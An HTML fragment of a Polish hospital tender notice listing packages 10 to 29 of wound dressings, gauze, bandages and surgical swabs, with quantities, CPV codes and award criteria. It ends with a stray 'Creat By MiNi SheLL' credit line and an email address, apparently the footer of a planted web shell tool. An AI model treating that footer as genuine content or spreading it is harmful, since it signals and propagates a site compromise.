<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10 Opatrunki specjalistyczne VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny opatrunek z pianki poliuretanowej z wkładką chłonną nieprzylepny  15cm x 20cm lub 12cm x 25cm	szt.	100
Dopuszcza się 10% tolerancji w rozmiarach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11 Opatrunki specjalistyczne VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny opatrunek alginianowy z jonami srebra,  nieprzylepny  10cm x 20 cm	szt.	50
Dopuszcza się 10% tolerancji w rozmiarach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12 Opatrunki specjalistyczne VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sterylny opatrunek hydrożelowy  typu aquagel  20 cm x 40 cm	szt.	10
2	Sterylny opatrunek hydrożelowy  typu aquagel na twarz 25 cm x 25 cm	szt.	2
3	Sterylny opatrunek hydrożelowy  typu aquagel na twarz 30 cm x 40 cm	szt.	2
Dopuszcza się 10% tolerancji w rozmiarach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13 Opatrunek foliowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opatrunek foliowy, poliuretanowy z ramką, samoprzylepny, jałowy, przezroczysty, optymalny czas utrzymania opatrunku 3-4 dni w rozmiarze 10cm x 12cm, umożliwiający mocowanie i zabezpieczenie cewników do żył centralnych	szt.	1300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14 Podkład podgumowany i buty foliowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ochraniacze na obuwie, z folii polietylenowej antypoślizgowej, góra ochraniacza ściągnięta gumką x 100 szt.	op.	40
2	Podkład podgumowany  na tkaninie (nie flizelinowy nie włókninowy) 120-160 x 60-80cm 	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15 Setony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Seton gazowy sterylny  2cm x 2m 4 warstwowy x 1 szt.	szt.	2000
2	Seton gazowy sterylny 10cm x 80cm-100cm 4 warstwowy. z nitką Rtg x 1 szt.	szt.	1200
Opakowanie typu blister. Na każdym opakowaniu oprócz etykiety głównej powinna znajdować się metka samoprzylepna z nazwą producenta, numerem katalogowym artykułu, datą ważności i nume-rem serii (do wklejenia do dokumentacji medycznej pacjenta).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16 Tupfery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Tupfer gazowy fasola 15x15 cm, z gazy 17 nitek,  z nitka RTG, sterylny, opakowanie x 20 szt.	op.	1500
2	Tupfer gazowy kula 20 x 20 cm z gazy 17 nitek sterylny opakowanie x  5 szt.	op.	1200
3	Tupfer gazowy kula 20 x 20 cm z gazy 17 nitek sterylny opakowanie x  10 szt.	op.	1200
4	Tupfer gazowy rożek 18 x 18 cm z gazy 17 nitek sterylny opakowanie x  5 szt.	op.	300
5	Tupfer gazowy rożek 18 x 18 cm z gazy 17 nitek sterylny opakowanie x  10 szt.	op.	200
Opakowanie typu blister. Na każdym opakowaniu oprócz etykiety głównej powinna znajdować się metka samoprzylepna z nazwą producenta, numerem katalogowym artykułu, datą ważności i nume-rem serii (do wklejenia do dokumentacji medycznej pacjenta).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet 17 Opatrunki sterylne samoprzylepne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sterylny samoprzylepny opatrunek do zaopatrywania ran, pakowany pojedynczo 25 x 10cm 	szt.	2000
2	Sterylny samoprzylepny opatrunek do zaopatrywania ran, pakowany pojedynczo 20 x 10cm 	szt.	2000
3	Sterylny  samoprzylepny opatrunek do zaopatrywania ran, pakowany pojedynczo 15 x 6- 10cm 	szt.	3500
4	Sterylny  samoprzylepny opatrunek do zaopatrywania ran, pakowany pojedynczo 5 x 7-7,2 cm 	szt.	2500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet 18 Opatrunki niesterylne I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kompresy gazowe 5 x 5 cm, 8 warstw, gaza 17 nitek, zawijane brzegi - a 100szt.	op.	4500
2	Kompresy gazowe 10 x 10 cm, 8warstw, gaza17 nitek, zawijane brzegi - a 100szt.	op.	4000
3	Kompresy gazowe 7,5 x7,5 cm, 8warstw, gaza17 nitek, zawijane brzegi- a 100szt.	op.	4000
4	Opaska dziana 10cm x 4m  pakowana pojedynczo w szczelnym opakowaniu	szt.	14000
5	Opaska dziana 15cm x 4m  pakowana pojedynczo w szczelnym opakowaniu	szt.	13000
6	Opaska elastyczna tkana z zapinką 10 cm x 4 m pakowana pojedynczo 	szt.	3000
7	Opaska elastyczna tkana z zapinką 12 cm x 4 m pakowana pojedynczo	szt.	2500
8	Opaska elastyczna tkana z zapinką 15 cm x 4 m pakowana pojedynczo	szt.	9000
9	Siatka elastyczna do podtrzymywania opatrunków na głowę	mb	1000
10	Siatka elastyczna do podtrzymywania opatrunków na udo	mb	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet 19 Opatrunki niesterylne II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chusta trójkątna bawełniana	szt.	2200
2	Gaza bielona bez użycia chloru 17 nitek szer.90 cm	mb	10000
3	Lignina bielona arkusze 	kg	3500
4	Lignina rolki a 150 g	szt.	3000
5	Wata bawełniano-wiskozowa, zawartość bawełny min. 70%, opakowanie a 0,5kg	op.	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet 20 Opatrunki gipsowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Opaska gipsowa 3-3,5 minutowa 10cm x 3 m	szt.	2000
2	Opaska gipsowa 5-6-cio minutowa 12cm x 3 m	szt.	2500
3	Opaska gipsowa 5-6-cio minutowa 14-15cm x 3 m	szt.	5000
4	Opaska gipsowa szybkowiążąca 3-5-cio minutowa typ longeta 4 warstwowa, 20cm x 20m 14-15cm x 3m	op.	10
5	Opaska wyściełająca z waty syntetycznej 10cm x 3m	szt.	2500
6	Opaska wyściełająca z waty syntetycznej 15cm x 3m	szt.	4000
Seria i data  ważności na pojedynczym(podwójnym maksymalnie) opakowaniu  dla poz 1-3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 21 Pakiet sterylnych opatrunków I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kompresy z gazy 17-nitek, 8 warstw, zawijane do środka brzegi, pakiet  sterylny 5 x 5cm a 3 szt.	op.	50000
2	Kompresy z gazy 17-nitek, 8 warstw, zawijane do środka brzegi pakiet sterylny 7,5 x 7,5cm a 3 szt.	op.	30000
3	Kompresy z gazy 17-nitek, 8 warstw, zawijane do środka brzegi pakiet sterylny 7,5 x 7,5cm a 10 szt.	op.	10000
4	Kompresy z gazy 17-nitek, 8 warstw, zawijane do środka brzegi pakiet sterylny 10 x 10cm a 10 szt.	op.	34000
5	Kompresy z gazy 17-nitek, 8 warstw, zawijane do środka brzegi pakiet sterylny 10 x 10 cm a 20 szt.	op.	3000
Opakowanie typu blister.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet nr 22 Pakiet sterylnych opatrunków II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kompresy z gazy 17-nitek, 8 warstw, z nitką RTG, podwinięte do środka brzegi pakiet sterylny 10 x 10cm a 10 szt.	op.	1200
2	Kompresy z gazy 17-nitek, 8 warstw, z nitką RTG, podwinięte do środka brzegi pakiet sterylny 10 x 10cm a 20 szt.	op.	1200
3	Kompresy z gazy 17-nitek, 8 warstw, z nitką RTG, podwinięte do środka brzegi pakiet sterylny 10 x 10cm a 40 szt.	op.	1200
Opakowanie typu blister. Na każdym opakowaniu oprócz etykiety głównej powinna znajdować się metka samoprzylepna z nazwą producenta, numerem katalogowym artykułu, datą ważności i nume-rem serii (do wklejenia do dokumentacji medycznej pacjenta).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet nr 23 Pakiet sterylnych opatrunków III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompresy z gazy 17-nitek, 12 warstw, z nitką RTG, podwinięte do środka brzegi pakiet sterylny 10 x 10cm a 40szt.	op.	1500
Opakowanie typu blister. Na każdym opakowaniu oprócz etykiety głównej powinna znajdować się metka samoprzylepna z nazwą producenta, numerem katalogowym artykułu, datą ważności i nume-rem serii (do wklejenia do dokumentacji medycznej pacjenta).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet nr 24 Pakiet sterylnych serwet.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	45 x 45 cm 4 warstwowe, 17 nitek,  z nitką RTG na całej długości, z tasiemką, po wstępnym praniu, pakiet sterylny a 3 szt.	op.	800
2	45 x 45 cm 4 warstwowe., 17 nitek,  z nitką RTG na całej długości, z tasiemką, po wstępnym praniu, pakiet sterylny a 5 szt.	op.	400
3	45 x 70 cm 4 warstwowe., 17 nitek,  z nitką RTG na całej długości, z tasiemką, po wstępnym praniu, pakiet sterylny a 2 szt.	op.	2000
4	45 x 70 cm 4 warstwowe., 17 nitek,  z nitką RTG na całej długości, z tasiemką, po wstępnym praniu, pakiet sterylny a 5 szt.	op.	2000
Opakowanie typu blister. Na każdym opakowaniu oprócz etykiety głównej powinna znajdować się metka samoprzylepna z nazwą producenta, numerem katalogowym artykułu, datą ważności i nume-rem serii (do wklejenia do dokumentacji medycznej pacjenta).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet nr 25 Podkłady ginekologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Podkłady ginekologiczne 34 cm x 9 cm sterylne	szt.	1000
2	Podkłady ginekologiczne 34 cm x 9 cm niejałowe	szt.	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet nr 26 Gaza sterylna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gaza sterylna kopertowana 17-nitkowa, 8 warstwowa, 1 m2	szt.	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet 27 Serwety niesterylne I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serwety 45x45 cm, 4 warstwy, 17-20 nitek, z tasiemką, z elementem RTG, po wstępnym praniu	szt.	7000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet 28 Serwety niesterylne II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serwety 45x70 cm, 4 warstwy, 17-20 nitek, z tasiemką, nitka RTG na całej długości, po wstępnym praniu	szt.	7000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet nr 29 Tampony neurochirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Tampony neurochirurgiczne 7mm x 7mm posiadające znacznik RTG, z lejcami, sterylne	szt.	400
2	Tampony neurochirurgiczne 13mm x 13mm posiadające znacznik RTG, z lejcami, sterylne	szt.	8000
3	Tampony neurochirurgiczne 25mm x 25mm posiadające znacznik RTG, z lejcami, sterylne	szt.	8000
4	Tampony neurochirurgiczne 51mm x 152mm posiadające znacznik RTG, z lejcami, sterylne	szt.	4000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.16-6, 33.14.11.19-7, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium techniczne (użyteczność) - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com